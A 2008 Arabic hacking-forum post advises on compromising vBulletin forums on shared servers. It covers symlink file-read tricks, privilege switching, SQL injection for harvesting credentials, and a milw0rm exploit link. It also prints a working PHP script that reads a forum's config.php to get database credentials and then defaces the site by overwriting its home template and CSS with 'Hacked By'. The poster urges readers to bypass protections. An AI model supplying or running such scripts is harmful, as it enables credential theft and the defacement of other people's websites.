عرض مشاركة واحدة
 
قديم 07-22-2008, 02:13 PM   #8 (permalink)
joker_1
عضو مميز






joker_1 غير متصل

joker_1 will become famous soon enoughjoker_1 will become famous soon enough

افتراضي رد: الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى

اقتباس:
المشاركة الأصلية كتبت بواسطة الشمررري
   ^_^

اذا سيرفر خاص ورفعت عليه شل وعليه منتدى اضمن 99% انه راح يخترق

كلام صحيح اخوي

واسمح لي اعدل في النسبة الي حطيتها انت 999%

منتديات الفي بي معر,فة بقوتها من ناحية الريمود اتاك
بس ضعيفة من ناحية الوكل اتاك

يعني عندك اكاونت بالسيرفر يبقي علي المنتدي السلام مهما كان مشفر او معدول او حتي نسخة فيبي خاصة وحصرية وصانعتها الشركة مخصوص لك - زي ما قال واحد كدا هههههه

يعني الحين هو معدل التصاريح السيمي لنك يعطيك فيربيدين

عندك دبشة حلول - دبشة يعني اكتر من 100

اول شي ممكن تحول صلاحيتك سواء من ال php او perl
وفي python بس محد يعرفها ههههههههههه

غير كدا الكل يستعمل السيمي لنك مع انة في ثغرات قرائة كتييرة

ومن حظ اصحاب المواقع انة ما يعرفها غير عدد بسيط من الهكر

ايضا مرات تكون السيمي لنك شغالة بس ما تقدر تسحب الملف


يبقي انتا عليك بس تسحبة بثغرة قرايتها اقوي -يعني قرايتة بطريقة غير المتصفح

مثل ايش يا جوكر

مثل هاي يخوي
http://www.milw0rm.com/exploits/3459

ممكن اعطيكم روابط لاستعمال السيمي لنك في الاختراقات بتاريخ 2004
بس الهكر العرب ما يعرفوها الا من كم شهر فات

الطرق كثير ومتشرة والشاطر الي يحصل اكبر كمية منها

وطبعا البرايفت مطلوب ليش ؟ لان النت مليان اطفال هكر



شي تاني مين قال اصلا انك محتاج تقرا الكونفيق عشان تخترق المنتدي ؟

في طريق ممكن تخترق بدون كونفيق

مثل ايش يا جوكر ؟

مثل دي
كود PHP:

<?php
include("/home/wxxxx/public_html/includes/config.php");

$variabls=get_defined_vars();

$pos=count($variabls)-1;

$keys array_keys($variabls);

$servername=$variabls[$keys[$pos]]['MasterServer']['servername'];
$username=$variabls[$keys[$pos]]['MasterServer']['username'];
$password=$variabls[$keys[$pos]]['MasterServer']['password'];
$database=$variabls[$keys[$pos]]['Database']['dbname'];

mysql_connect($servername,$username,$password);
mysql_select_db($database);

$tryag 'UPDATE `template` SET `template` = \'Hacked By \'WHERE `title` =\'FORUMHOME\';';
$tryag2'UPDATE `style` SET `css` = \'Hacked By \', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;';
$result=mysql_query($tryag) or die(mysql_error());
$result=mysql_query($tryag2) or die(mysql_error());
?>
بس عدل المسار

بس طبعا في حماية تمنعها

بس عليك تتخطي الحماية
او تستعمل دالة ثانية غير الي بالاسكربت


وفي كمان سكربتات تجيبلك يوزر وباس السيكل لليوزر الي تبي تخترقة

غير انك ممكن تجيب كل يوزرات وباسوردات القواعد من اقرب ثغرة سيكل انجكشن بالسيرفر
اذا ما لقيت ثغرة تقدر تسوي ثغرة لوحدك


ياريت الشباب تبعث وتفتش المواقع وصدقني تعرف امتي بتكون هكر ممتاز ؟

لما تيجي تفتح القوقل ويقولك
" ياخي كرهتني انت كل يوم تبحث فيني انا تعبت منك "

تحياتي

اخوكم
  رد مع اقتباس